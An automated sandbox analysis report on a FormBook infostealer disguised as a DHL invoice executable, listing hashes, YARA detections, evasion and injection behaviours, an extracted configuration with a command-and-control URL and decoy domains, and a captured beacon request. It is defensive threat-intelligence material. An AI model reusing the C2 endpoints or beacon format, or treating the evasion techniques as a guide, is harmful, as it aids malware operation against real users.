Windows Analysis Report DHL-D02816048INV.exe

Overview

General Information

Sample Name:	DHL-D02816048INV.exe
Analysis ID:	532856
MD5:	b3fa350f2e1ece97a44ae6ae1248b5a1
SHA1:	05726361dd73119f77810887e4fc8a09d99167af
SHA256:	b5a0b2dd16e479af9029958ee35a367fad0d42a0b3d460c7cb95982ae27d1107
Tags:	DHLexeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sigma detected: Suspicius Add Task From User AppData Temp

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.saponifiedeffects.com/sbe5/"], "decoy": ["energistichealth.com", "fastnetgaming.com", "savethegreathighway.com", "pgonline000.online", "mri-fresno.com", "cleaningexpertsofcentralfl.com", "pl-id14826454.xyz", "jumtix.xyz", "cryptohealthpass.com", "thecommsite.xyz", "yz6022.com", "sethranderson.com", "energyclaimsteam.com", "northernprowellness.com", "megaroyalshop.com", "rdjunshi.com", "mspsignals.com", "fury.website", "citie-dct.com", "wideguesspunishment.xyz", "annarborstorage.info", "californiavenuesprogram.com", "opensourcedao.com", "precisionsolutionsinfo.com", "charleyschutz.com", "chatham-kenthomes.com", "colowi.digital", "darkperseus.net", "solar-tribe.com", "lighthousecreative.net", "texasmotorcycletransport.com", "unlockhomemade.com", "sahinkardeslerelektrik.xyz", "atozitgroup.com", "alexandrahowardevents.com", "lifeinstreams.com", "tenloe036.xyz", "dubaimistressemperatrix.com", "zoyathecollection.com", "windrowysxqtn.xyz", "metaphilippines.com", "healthywaterlife.com", "boypoll.space", "fidelspropiedades.com", "xbet973.com", "verpeilhuette.com", "mangotangoentertainment.com", "solfindel.com", "cwtbx.com", "celebrationsmagny.com", "yitongbag.com", "wappieparty.com", "kramacamas.quest", "wasl.xyz", "stylists411.com", "xn--kws549fp3p.com", "investguide.club", "alienthing.com", "beststyletosewwithguineafor.men", "a26d31d5d6986cbe.com", "rnjstudios.com", "choicenochoicegame.com", "myhkterstugroup.net", "115edinburghway.com"]}

Multi AV Scanner detection for submitted file

Source: DHL-D02816048INV.exe	Virustotal: Detection: 21%			Perma Link
Source: DHL-D02816048INV.exe	ReversingLabs: Detection: 37%

Yara detected FormBook

Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 12.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: DHL-D02816048INV.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: DHL-D02816048INV.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 0000000C.00000002.431407891.0000000002F50000.00000040.00020000.sdmp
Source:	Binary string: colorcpl.pdb source: RegSvcs.exe, 0000000C.00000002.431407891.0000000002F50000.00000040.00020000.sdmp
Source:	Binary string: RegSvcs.pdb, source: colorcpl.exe, 00000017.00000002.574594635.00000000052CF000.00000004.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000C.00000002.429620021.0000000000FEF000.00000040.00000001.sdmp, RegSvcs.exe, 0000000C.00000002.429420009.0000000000ED0000.00000040.00000001.sdmp, colorcpl.exe, 00000017.00000002.573469576.0000000004DA0000.00000040.00000001.sdmp, colorcpl.exe, 00000017.00000002.573806747.0000000004EBF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.429620021.0000000000FEF000.00000040.00000001.sdmp, RegSvcs.exe, 0000000C.00000002.429420009.0000000000ED0000.00000040.00000001.sdmp, colorcpl.exe, colorcpl.exe, 00000017.00000002.573469576.0000000004DA0000.00000040.00000001.sdmp, colorcpl.exe, 00000017.00000002.573806747.0000000004EBF000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: colorcpl.exe, 00000017.00000002.574594635.00000000052CF000.00000004.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi		12_2_00417D1A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop edi		23_2_00E77D1A

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 170.33.14.35 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tenloe036.xyz

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.tenloe036.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.saponifiedeffects.com/sbe5/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /sbe5/?6lCD=2d_DYnvpcjZhuXNp&2drL=hJVLAZMnnNruOqbGQPlMF5VPc4ENbq+TMFifUDKwKaxhTHZ11JYQSb+b1d7n+ALeG6Br HTTP/1.1Host: www.tenloe036.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: NgxFenceDate: Thu, 02 Dec 2021 17:58:31 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 263Connection: closeX-Cache: MISSData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 65 6e 6c 6f 65 30 33 36 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.tenloe036.xyz Port 80</address></body></html>

Source: DHL-D02816048INV.exe, 00000000.00000002.346211763.0000000002991000.00000004.00000001.sdmp, DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp

String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: unknown

DNS traffic detected: queries for: www.tenloe036.xyz

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: DHL-D02816048INV.exe, 00000000.00000002.345729931.0000000000BFA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: DHL-D02816048INV.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.375889296.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.428933035.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.573034313.0000000004B60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.343762069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.430275291.0000000001200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.573171748.0000000004B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.571411429.0000000000E60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
